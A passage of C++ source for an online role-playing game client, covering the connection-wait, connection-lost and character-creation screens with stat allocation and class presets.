		{	ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			if (m_pLSock != NULL)
			{	delete m_pLSock;
				m_pLSock = NULL;
			}
			if (m_pGSock != NULL)
			{	delete m_pGSock;
				m_pGSock = NULL;
		}	}
		m_bEscPressed = FALSE;
		return;
	}

	if ((dwTime - dwMTime) > 150) dwMTime = dwTime;

	if ((dwTime - dwCTime) > 100) {
		m_cMenuFrame++;
		dwCTime = dwTime;
	}
	if (m_cMenuFrame >= 8) {
		m_cMenuDirCnt++;
		if (m_cMenuDirCnt > 8) {
			m_cMenuDir++;
			m_cMenuDirCnt = 1;
		}
		m_cMenuFrame = 0;
	}
	if (m_cMenuDir > 8) m_cMenuDir = 1;

	m_DDraw.ClearBackB4();

	m_bIsHideLocalCursor = TRUE;
	switch (m_cMsg[0]) {
	case '0':
		_Draw_UpdateScreen_OnCreateNewAccount();
		break;

	case '1':
		sX = 146;
		sY = 114;
		_Draw_OnLogin(m_cAccountName, m_cAccountPassword, 0, 0);
		break;

	case '2':
		_bDraw_OnCreateNewCharacter(m_cPlayerName, 0, 0, 0);
		break;

	case '3':
		UpdateScreen_OnSelectCharacter(0, 0, 0, 0);
		break;

	case '4':
		// Change Password
		UpdateScreen_OnSelectCharacter(0, 0, 0, 0, TRUE);
		break;

	case '5':
		m_DDraw.ClearBackB4();
		break;
	}
	m_bIsHideLocalCursor = FALSE;

#ifdef RES_HIGH
	m_DDraw.DrawShadowBox(0,0,800,600);
#else
	m_DDraw.DrawShadowBox(0,0,639,479);
#endif
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME4, 162 + SCREENX,125 + SCREENY,2);
	wsprintf(G_cTxt, "Connecting to Server... %3dSec", (dwTime - m_dwTime)/1000);
	PutString_SprFont(172 + 35 + SCREENX, 190 + SCREENY, G_cTxt, 7,0,0);

	if ((dwTime - m_dwTime) > 7000)
	{	PutAlignedString(180 + SCREENX, 463 + SCREENX, 195+30 + SCREENY, UPDATE_SCREEN_ON_CONNECTING1);//"Press ESC key during long time of no"
		PutAlignedString(180 + SCREENX, 463 + SCREENX, 195+45 + SCREENY, UPDATE_SCREEN_ON_CONNECTING2);//"connection and return to the main menu."
	}
	else PutAlignedString(180 + SCREENX, 463 + SCREENX, 195+30 + SCREENY, UPDATE_SCREEN_ON_CONNECTING3);//"  Connecting to server. Please wait..."

	DrawVersion();
	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 8, dwTime);

	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::UpdateScreen_OnWaitInitData()
{
 short msX, msY, msZ;
 char cLB, cRB;
 DWORD dwTime = timeGetTime();

	if (m_cGameModeCount == 0) {
		m_bEnterPressed = FALSE;
		m_bEscPressed   = FALSE;
	}
	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;

	if (m_bEscPressed == TRUE) {
		if ((dwTime - m_dwTime) > 7000)
		{	ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			if (m_pLSock != NULL)
			{	delete m_pLSock;
				m_pLSock = NULL;
			}
			if (m_pGSock != NULL)
			{	delete m_pGSock;
				m_pGSock = NULL;
		}	}
		m_bEscPressed = FALSE;
		return;
	}

	m_DDraw.ClearBackB4();
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME4, 162 + SCREENX,125 + SCREENY,2);

	wsprintf(G_cTxt,"Waiting for response... %dsec", (dwTime - m_dwTime)/1000);
	PutString_SprFont(172+ 44 + SCREENX, 190 + SCREENY, G_cTxt, 7,0,0);
	if ((dwTime - m_dwTime) > 7000) {
		PutAlignedString(174 + SCREENX, 467 + SCREENX, 190+30 + SCREENY, UPDATE_SCREEN_ON_WAIT_INIT_DATA1);//"Press ESC key during long time of no"
		PutAlignedString(174 + SCREENX, 467 + SCREENX, 190+45 + SCREENY, UPDATE_SCREEN_ON_WAIT_INIT_DATA2);//"connection and return to the main menu."
	}
	else PutAlignedString(174 + SCREENX, 467 + SCREENX, 195+30 + SCREENY, UPDATE_SCREEN_ON_WAIT_INIT_DATA3);//  Connecting to server. Please wait..."

	DrawVersion();
	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 8, dwTime);

	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::UpdateScreen_OnConnectionLost()
{short msX, msY, msZ;
 char cLB, cRB;
 static DWORD dwTime;
	if (m_cGameModeCount == 0)
	{	dwTime = timeGetTime();
		if (m_bSoundFlag) m_pESound[38]->bStop();
		if ((m_bSoundFlag) && (m_bMusicStat == TRUE))
		{	StopBGM();	// Snoopy: mp3 support
			if (m_pBGM != NULL) m_pBGM->bStop();
	}	}
	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;
	m_DDraw.ClearBackB4();
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME4, 162 + SCREENX,125 + SCREENY,2);
	PutString_SprFont(172 + 54 + SCREENX, 180 + SCREENY, "Connection Lost!", 7,0,0);
	PutString(172+50 + SCREENX, 180+30 + SCREENY, UPDATE_SCREEN_ON_CONNECTION_LOST, RGB(0,0,0));//"
	DrawVersion();
	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);

	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();

	if ((timeGetTime() - m_dwTime) > 5000)
	{	if (strlen(G_cCmdLineTokenA) != 0)
			 ChangeGameMode(DEF_GAMEMODE_ONQUIT);
		else
		{	ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
	}	}
}

BOOL CGame::_bDraw_OnCreateNewCharacter(char * pName, short msX, short msY, int iPoint)
{
 BOOL bFlag = TRUE;
 DWORD dwTime = timeGetTime();
 int i=0;

	m_DDraw.ClearBackB4();

	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_NEWCHAR, 0+SCREENX, 0 + SCREENY, 0, TRUE);
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 0 + SCREENX, 0 + SCREENY, 69, TRUE);
	PutAlignedString(64 + SCREENX, 282 + SCREENX, 90 + SCREENY, _BDRAW_ON_CREATE_NEW_CHARACTER1, 5,5,5);//"
	PutAlignedString(57 + SCREENX, 191 + SCREENX, 110 + SCREENY, DEF_MSG_CHARACTERNAME, 5,5,5);//"Character Name"
	if (m_cCurFocus != 1) PutString(197 + SCREENX, 112 + SCREENY, pName, RGB(25,35,25));
	PutAlignedString(64 + SCREENX, 282 + SCREENX, 140 + SCREENY, _BDRAW_ON_CREATE_NEW_CHARACTER2, 5,5,5);//"
	PutString(100 + SCREENX, 160 + SCREENY, DEF_MSG_GENDER, RGB(5,5,5));//"Gender"
	PutString(100 + SCREENX, 175 + SCREENY, DEF_MSG_SKINCOLOR, RGB(5,5,5));//"Skin Color"
	PutString(100 + SCREENX, 190 + SCREENY, DEF_MSG_HAIRSTYLE, RGB(5,5,5));//"Hair Style"
	PutString(100 + SCREENX, 205 + SCREENY, DEF_MSG_HAIRCOLOR, RGB(5,5,5));//"Hair Color"
	PutString(100 + SCREENX, 220 + SCREENY, DEF_MSG_UNDERWEARCOLOR, RGB(5,5,5));//"Underwear Color"
	
	PutString(100 + SCREENX, 275 + SCREENY, DEF_MSG_STRENGTH, RGB(5,5,5));//"Strength"
	PutString(100 + SCREENX, 292 + SCREENY, DEF_MSG_VITALITY, RGB(5,5,5));//"Vitality"
	PutString(100 + SCREENX, 309 + SCREENY, DEF_MSG_DEXTERITY, RGB(5,5,5));//"Dexterity"
	PutString(100 + SCREENX, 326 + SCREENY, DEF_MSG_INTELLIGENCE, RGB(5,5,5));//"Intelligence"
	PutString(100 + SCREENX, 343 + SCREENY, DEF_MSG_MAGIC, RGB(5,5,5));//"Magic"
	PutString(100 + SCREENX, 360 + SCREENY, DEF_MSG_CHARISMA, RGB(5,5,5));//"Charisma"

	wsprintf(G_cTxt, "%d", m_ccStr);
	PutString(204 + SCREENX, 277+ 16*i++ + SCREENY, G_cTxt, RGB(25,35,25));
	wsprintf(G_cTxt, "%d", m_ccVit);
	PutString(204 + SCREENX, 277+ 16*i++ + SCREENY, G_cTxt, RGB(25,35,25));
	wsprintf(G_cTxt, "%d", m_ccDex);
	PutString(204 + SCREENX, 277+ 16*i++ + SCREENY, G_cTxt, RGB(25,35,25));
	wsprintf(G_cTxt, "%d", m_ccInt);
	PutString(204 + SCREENX, 277+ 16*i++ + SCREENY, G_cTxt, RGB(25,35,25));
	wsprintf(G_cTxt, "%d", m_ccMag);
	PutString(204 + SCREENX, 277+ 16*i++ + SCREENY, G_cTxt, RGB(25,35,25));
	wsprintf(G_cTxt, "%d", m_ccChr);
	PutString(204 + SCREENX, 277+ 16*i++ + SCREENY, G_cTxt, RGB(25,35,25));

	if (strlen(pName) <= 0) bFlag = FALSE;
	if (iPoint > 0) bFlag = FALSE;
	if (m_Misc.bCheckValidName(pName) == FALSE) bFlag = FALSE;

	if ( (bFlag == TRUE) && (m_cCurFocus == 2) ) m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(384 + SCREENX, 445 + SCREENY, 25, dwTime);
	else m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(384 + SCREENX, 445 + SCREENY, 24, dwTime);
	if (m_cCurFocus == 3)
		 m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(500 + SCREENX, 445 + SCREENY, 17, dwTime);
	else m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(500 + SCREENX, 445 + SCREENY, 16, dwTime);
	if (m_cCurFocus == 4)
		 m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(60 + SCREENX, 445 + SCREENY, 68, dwTime);
	else m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(60 + SCREENX, 445 + SCREENY, 67, dwTime);
	if (m_cCurFocus == 5)
		 m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(145 + SCREENX, 445 + SCREENY, 66, dwTime);
	else m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(145 + SCREENX, 445 + SCREENY, 65, dwTime);
	if (m_cCurFocus == 6)
		 m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(230 + SCREENX, 445 + SCREENY, 64, dwTime);
	else m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(230 + SCREENX, 445 + SCREENY, 63, dwTime);
	

	ShowReceivedString();

	switch (m_cGender) {
	case 1:	_tmp_sOwnerType = 1; break;
	case 2:	_tmp_sOwnerType = 4; break; //@@@@@@@@@@@@@@@@@!!!!!!!!!!!!!!!!!
	}
	_tmp_sOwnerType += m_cSkinCol - 1;
	_tmp_cDir   = m_cMenuDir;
	_tmp_sAppr1 = 0;
	_tmp_sAppr1 = _tmp_sAppr1 | (m_cUnderCol);
	_tmp_sAppr1 = _tmp_sAppr1 | (m_cHairStyle << 8);
	_tmp_sAppr1 = _tmp_sAppr1 | (m_cHairCol << 4);
	_tmp_sAppr2 = 0;
	_tmp_sAppr3 = 0;
	_tmp_sAppr4 = 0;
	ZeroMemory(_tmp_cName, sizeof(_tmp_cName));
	memcpy(_tmp_cName, m_cPlayerName,10);
	_tmp_cAction = DEF_OBJECTMOVE;
	_tmp_cFrame = m_cMenuFrame;

	_Draw_CharacterBody( 507 + SCREENX, 267 + SCREENY, _tmp_sOwnerType);

	DrawObject_OnMove_ForMenu(0 + SCREENX, 0 + SCREENY, 500 + SCREENX, 174 + SCREENY, FALSE, dwTime, msX, msY);

    i = 0 ;

	PutString(445 + SCREENX, 192 + SCREENY, DEF_MSG_HITPOINT, RGB(5,5,5));//"Hit Point"
	wsprintf(G_cTxt, "%d", m_ccVit*3 + 2 + m_ccStr/2);
	PutString(550 + SCREENX, 192 + 16*i++ + SCREENY, G_cTxt, RGB(25,35,25));

	PutString(445 + SCREENX, 208 + SCREENY, DEF_MSG_MANAPOINT, RGB(5,5,5));//"Mana Point"
	wsprintf(G_cTxt, "%d", m_ccMag*2 + 2 + m_ccInt/2);
	PutString(550 + SCREENX, 192 + 16*i++ + SCREENY, G_cTxt, RGB(25,35,25));

	PutString(445 + SCREENX, 224 + SCREENY, DEF_MSG_STAMINARPOINT, RGB(5,5,5));//"Staminar Point"
	wsprintf(G_cTxt, "%d", m_ccStr*2 + 2);
	PutString(550 + SCREENX, 192 + 16*i++ + SCREENY, G_cTxt, RGB(25,35,25));

	return bFlag;
}

void CGame::UpdateScreen_OnCreateNewCharacter()
{static class CMouseInterface * pMI;
 int i=0;
 int iMIbuttonNum;
 static int iPoint;
 char cLB, cRB, cMIresult;
 static char cName[12];
 static char cPrevFocus;
 short msX, msY, msZ;
 BOOL bFlag;
 static DWORD dwMTime;
 DWORD dwTime = timeGetTime();

	if (m_cGameModeCount == 0)
	{	pMI = new class CMouseInterface;
		pMI->AddRect(65+4+SCREENX, 65+45 + SCREENY, 275+4 + SCREENX, 82+45 + SCREENY);

		pMI->AddRect(232+4 + SCREENX, 111+45 + SCREENY, 274+4 -21 + SCREENX, 124+45 + SCREENY);
		pMI->AddRect(255+4 + SCREENX, 111+45 + SCREENY, 289+4 -13 + SCREENX, 124+45 + SCREENY);

		pMI->AddRect(232+4 + SCREENX, 126+45 + SCREENY, 274+4 -21 + SCREENX, 139+45 + SCREENY);
		pMI->AddRect(255+4 + SCREENX, 126+45 + SCREENY, 289+4 -13 + SCREENX, 139+45 + SCREENY);

		pMI->AddRect(232+4 + SCREENX, 141+45 + SCREENY, 274+4 -21 + SCREENX, 154+45 + SCREENY);
		pMI->AddRect(255+4 + SCREENX, 141+45 + SCREENY, 289+4 -13 + SCREENX, 154+45 + SCREENY);

		pMI->AddRect(232+4 + SCREENX, 156+45 + SCREENY, 274+4 -21 + SCREENX, 169+45 + SCREENY);
		pMI->AddRect(255+4 + SCREENX, 156+45 + SCREENY, 289+4 -13 + SCREENX, 169+45 + SCREENY);

		pMI->AddRect(232+4 + SCREENX, 171+45 + SCREENY, 274+4 -21 + SCREENX, 184+45 + SCREENY);
		pMI->AddRect(255+4 + SCREENX, 171+45 + SCREENY, 289+4 -13 + SCREENX, 184+45 + SCREENY);

		pMI->AddRect(232+4 + SCREENX, 231+45 + SCREENY, 253+4 + SCREENX, 244+45 + SCREENY);
		pMI->AddRect(255+4 + SCREENX, 231+45 + SCREENY, 276+4 + SCREENX, 244+45 + SCREENY);

		pMI->AddRect(232+4 + SCREENX, 246+45 + SCREENY, 253+4 + SCREENX, 259+45 + SCREENY);
		pMI->AddRect(255+4 + SCREENX, 246+45 + SCREENY, 276+4 + SCREENX, 259+45 + SCREENY);

		pMI->AddRect(232+4 + SCREENX, 261+45 + SCREENY, 253+4 + SCREENX, 274+45 + SCREENY);
		pMI->AddRect(255+4 + SCREENX, 261+45 + SCREENY, 276+4 + SCREENX, 274+45 + SCREENY);

		pMI->AddRect(232+4 + SCREENX, 276+45 + SCREENY, 253+4 + SCREENX, 289+45 + SCREENY);
		pMI->AddRect(255+4 + SCREENX, 276+45 + SCREENY, 276+4 + SCREENX, 289+45 + SCREENY);

		pMI->AddRect(232+4 + SCREENX, 291+45 + SCREENY, 253+4 + SCREENX, 304+45 + SCREENY);
		pMI->AddRect(255+4 + SCREENX, 291+45 + SCREENY, 276+4 + SCREENX, 304+45 + SCREENY);

		pMI->AddRect(232+4 + SCREENX, 306+45 + SCREENY, 253+4 + SCREENX, 319+45 + SCREENY);
		pMI->AddRect(255+4 + SCREENX, 306+45 + SCREENY, 276+4 + SCREENX, 319+45 + SCREENY);

		pMI->AddRect(384 + SCREENX, 445 + SCREENY, 384+72 + SCREENX, 445+15 + SCREENY);
		pMI->AddRect(500 + SCREENX, 445 + SCREENY, 500+72 + SCREENX, 445+15 + SCREENY);

		pMI->AddRect(60 + SCREENX, 445 + SCREENY, 60+72 + SCREENX, 445+15 + SCREENY);
		pMI->AddRect(145 + SCREENX, 445 + SCREENY, 145+72 + SCREENX, 445+15 + SCREENY);
		pMI->AddRect(230 + SCREENX, 445 + SCREENY, 230+72 + SCREENX, 445+15 + SCREENY);

		iPoint = m_ccStr + m_ccVit + m_ccDex + m_ccInt + m_ccMag + m_ccChr;
		iPoint  = 70 - iPoint;
		cPrevFocus  = 1;
		m_cCurFocus = 1;
		m_cMaxFocus = 6;
		m_bEnterPressed = FALSE;
		m_cArrowPressed = 0;
		dwMTime = timeGetTime();
		StartInputString(193+4 + SCREENX, 65+45 + SCREENY, 11, cName);
		ClearInputString();
	}
	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;

	if (m_cArrowPressed != 0)
	{	switch (m_cArrowPressed) {
		case 1:
			m_cCurFocus--;
			if (m_cCurFocus <= 0) m_cCurFocus = m_cMaxFocus;
			break;

		case 3:
			m_cCurFocus++;
			if (m_cCurFocus > m_cMaxFocus) m_cCurFocus = 1;
			break;
		}
		m_cArrowPressed = 0;
	}

	if (cPrevFocus != m_cCurFocus) {
		EndInputString();
		switch (m_cCurFocus) {
		case 1:
			StartInputString(193+4 + SCREENX, 65+45 + SCREENY, 11, cName);
			break;
		}
		cPrevFocus = m_cCurFocus;
	}

	if (m_bEscPressed == TRUE) {
		ChangeGameMode(DEF_GAMEMODE_ONSELECTCHARACTER);
		delete pMI;
		m_bEscPressed = FALSE;
		return;
	}

	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	bFlag = _bDraw_OnCreateNewCharacter(cName, msX, msY, iPoint);

	if ((dwTime - dwMTime) > 100)
	{	m_cMenuFrame++;
		dwMTime = dwTime;
	}
	if (m_cMenuFrame >= 8)
	{	m_cMenuDirCnt++;
		if (m_cMenuDirCnt > 8)
		{	m_cMenuDir++;
			m_cMenuDirCnt = 1;
		}
		m_cMenuFrame = 0;
	}
	if (m_cMenuDir > 8) m_cMenuDir = 1;

	DrawVersion();
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);
	iMIbuttonNum = pMI->iGetStatus(msX, msY, cLB, &cMIresult);
	if (cMIresult == DEF_MIRESULT_CLICK)
	{	PlaySound('E', 14, 5);
		switch (iMIbuttonNum) {
		case 1:
			m_cCurFocus = 1;
			break;
		case 2:
			m_cGender--;
			if (m_cGender < 1) m_cGender = 2;
			break;
		case 3:
			m_cGender++;
			if (m_cGender > 2) m_cGender = 1;
			break;
		case 4:
			m_cSkinCol--;
			if (m_cSkinCol < 1) m_cSkinCol = 3;
			break;
		case 5:
			m_cSkinCol++;
			if (m_cSkinCol > 3) m_cSkinCol = 1;
			break;
		case 6:
			m_cHairStyle--;
			if (m_cHairStyle < 0) m_cHairStyle = 7;
			break;
		case 7:
			m_cHairStyle++;
			if (m_cHairStyle > 7) m_cHairStyle = 0;
			break;
		case 8:
			m_cHairCol--;
			if (m_cHairCol < 0) m_cHairCol = 15;
			break;
		case 9:
			m_cHairCol++;
			if (m_cHairCol > 15) m_cHairCol = 0;
			break;
		case 10:
			m_cUnderCol--;
			if (m_cUnderCol < 0) m_cUnderCol = 7;
			break;
		case 11:
			m_cUnderCol++;
			if (m_cUnderCol > 7) m_cUnderCol = 0;
			break;
		case 12:
			if (iPoint > 0) {
				if (m_ccStr < 14) {
					m_ccStr++;
					iPoint--;
				}
			}
			break;
		case 13:
			if (m_ccStr > 10) {
				m_ccStr--;
				iPoint++;
			}
			break;
		case 14:
			if (iPoint > 0) {
				if (m_ccVit < 14) {
					m_ccVit++;
					iPoint--;
				}
			}
			break;
		case 15:
			if (m_ccVit > 10) {
				m_ccVit--;
				iPoint++;
			}
			break;
		case 16:
			if (iPoint > 0) {
				if (m_ccDex < 14) {
					m_ccDex++;
					iPoint--;
				}
			}
			break;
		case 17:
			if (m_ccDex > 10) {
				m_ccDex--;
				iPoint++;
			}
			break;
		case 18:
			if (iPoint > 0) {
				if (m_ccInt < 14) {
					m_ccInt++;
					iPoint--;
				}
			}
			break;
		case 19:
			if (m_ccInt > 10) {
				m_ccInt--;
				iPoint++;
			}
			break;
		case 20:
			if (iPoint > 0) {
				if (m_ccMag < 14) {
					m_ccMag++;
					iPoint--;
				}
			}
			break;
		case 21:
			if (m_ccMag > 10) {
				m_ccMag--;
				iPoint++;
			}
			break;
		case 22:
			if (iPoint > 0) {
				if (m_ccChr < 14) {
					m_ccChr++;
					iPoint--;
				}
			}
			break;
		case 23:
			if (m_ccChr > 10)
			{	m_ccChr--;
				iPoint++;
			}
			break;

		case 24:
			if (m_cCurFocus != 2)
			{	m_cCurFocus = 2;
				return;
			}
			if (bFlag == FALSE) return;
			if (m_Misc.bCheckValidName(cName) == FALSE) break;
			ZeroMemory(m_cPlayerName, sizeof(m_cPlayerName));
			strcpy(m_cPlayerName, cName);
			m_pLSock = new class XSocket(m_hWnd, DEF_SOCKETBLOCKLIMIT);
			GetIPByDNS();
			m_pLSock->bConnect(m_cLogServerAddr, m_iLogServerPort, WM_USER_LOGSOCKETEVENT);
			m_pLSock->bInitBufferSize(30000);
			ChangeGameMode(DEF_GAMEMODE_ONCONNECTING);
			m_dwConnectMode = MSGID_REQUEST_CREATENEWCHARACTER;
			ZeroMemory(m_cMsg, sizeof(m_cMsg));
			strcpy(m_cMsg,"22");
			delete pMI;
			return;


		case 25:
			if (m_cCurFocus != 3)
			{	m_cCurFocus = 3;
				return;
			}
			ChangeGameMode(DEF_GAMEMODE_ONSELECTCHARACTER);
			delete pMI;
			return;


		case 26: // WARRIOR
			if (m_cCurFocus != 4)
			{	m_cCurFocus = 4;
				return;
			}

			m_ccMag = 10 ;
			m_ccInt = 10 ;
			m_ccChr = 10 ;
			m_ccStr = 14 ;
			m_ccVit = 12 ;
			m_ccDex = 14 ;
			iPoint = m_ccStr + m_ccVit + m_ccDex + m_ccInt + m_ccMag + m_ccChr;
			iPoint  = 70 - iPoint;
			break;

		case 27: // MAGE
			if (m_cCurFocus != 5) {
				m_cCurFocus = 5;
				return;
			}

			m_ccMag = 14 ;
			m_ccInt = 14 ;
			m_ccChr = 10 ;
			m_ccStr = 10 ;
			m_ccVit = 12 ;
			m_ccDex = 10 ;
			iPoint = m_ccStr + m_ccVit + m_ccDex + m_ccInt + m_ccMag + m_ccChr;
			iPoint  = 70 - iPoint;
			break;

		case 28: // PRIEST
			if (m_cCurFocus != 6) {
				m_cCurFocus = 6;
				return;
			}

			m_ccMag = 12 ;
			m_ccInt = 10 ;
			m_ccChr = 14 ;
			m_ccStr = 14 ;
			m_ccVit = 10 ;
			m_ccDex = 10 ;
			iPoint = m_ccStr + m_ccVit + m_ccDex + m_ccInt + m_ccMag + m_ccChr;
			iPoint  = 70 - iPoint;
			break;
		}
	}
	//fuck sake :(
	if ((msX >= 65+4-127 + SCREENX) && (msX <= 275+4 + SCREENX) && (msY >= 65+45 + SCREENY) && (msY <= 82+45 + SCREENY)) {
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER1);
	}
	else
	if ((msX >= 261+4-212 + SCREENX) && (msX <= 289+4 + SCREENX) && (msY >= 111+45 + SCREENY) && (msY <= 124+45 + SCREENY)) {
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER2);
	}
	else
	if ((msX >= 261+4-212 + SCREENX) && (msX <= 289+4 + SCREENX) && (msY >= 126+45 + SCREENY) && (msY <= 139+45 + SCREENY)) {
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER3);
	}
	else
	if ((msX >= 261+4-212 + SCREENX) && (msX <= 289+4 + SCREENX) && (msY >= 141+45 + SCREENY) && (msY <= 154+45 + SCREENY)) {
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER4);
	}
	else
	if ((msX >= 261+4-212 + SCREENX) && (msX <= 289+4 + SCREENX) && (msY >= 156+45 + SCREENY) && (msY <= 169+45 + SCREENY)) {
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER5);
	}
	else
	if ((msX >= 261+4-212 + SCREENX) && (msX <= 289+4 + SCREENX) && (msY >= 171+45 + SCREENY) && (msY <= 184+45 + SCREENY)) {
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER6);
	}
	else
	if ((msX >= 240+4-175 + SCREENX) && (msX <= 268+4 + SCREENX) && (msY >= 231+45 + SCREENY) && (msY <= 244+45 + SCREENY)) {
		// Str
		i= 0 ;
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER7);
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER8);
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER9);
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER10);
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER11);
	}
	else if ((msX >= 240+4-175 + SCREENX) && (msX <= 268+4 + SCREENX) && (msY >= 246+45 + SCREENY) && (msY <= 259+45 + SCREENY)) {
		// Vit
		i= 0 ;
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER12);//"
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER13);//"
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER14);//"
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER15);//"
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER16);//"
	}
	else if ((msX >= 240+4-175 + SCREENX) && (msX <= 268+4 + SCREENX) && (msY >= 261+45 + SCREENY) && (msY <= 274+45 + SCREENY)) {
		// Dex
		i= 0 ;
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER17);//"
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER18);//"
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER19);//"
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER20);//"
	}
	else if ((msX >= 240+4-175 + SCREENX) && (msX <= 268+4 + SCREENX) && (msY >= 276+45 + SCREENY) && (msY <= 289+45 + SCREENY)) {
		// Int
		i= 0 ;
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER21);//"
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER22);//"
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER23);//"
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER24);
	}
	else if ((msX >= 240+4-175 + SCREENX) && (msX <= 268+4 + SCREENX) && (msY >= 291+45 + SCREENY) && (msY <= 304+45 + SCREENY)) {
		// Mag
		i= 0 ;
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER25);
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER26);
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER27);
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER28);
	}
	else if ((msX >= 240+4-175 + SCREENX) && (msX <= 268+4 + SCREENX) && (msY >= 306+45 + SCREENY) && (msY <= 319+45 + SCREENY)) {
		// Charisma
		i= 0 ;
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER29);
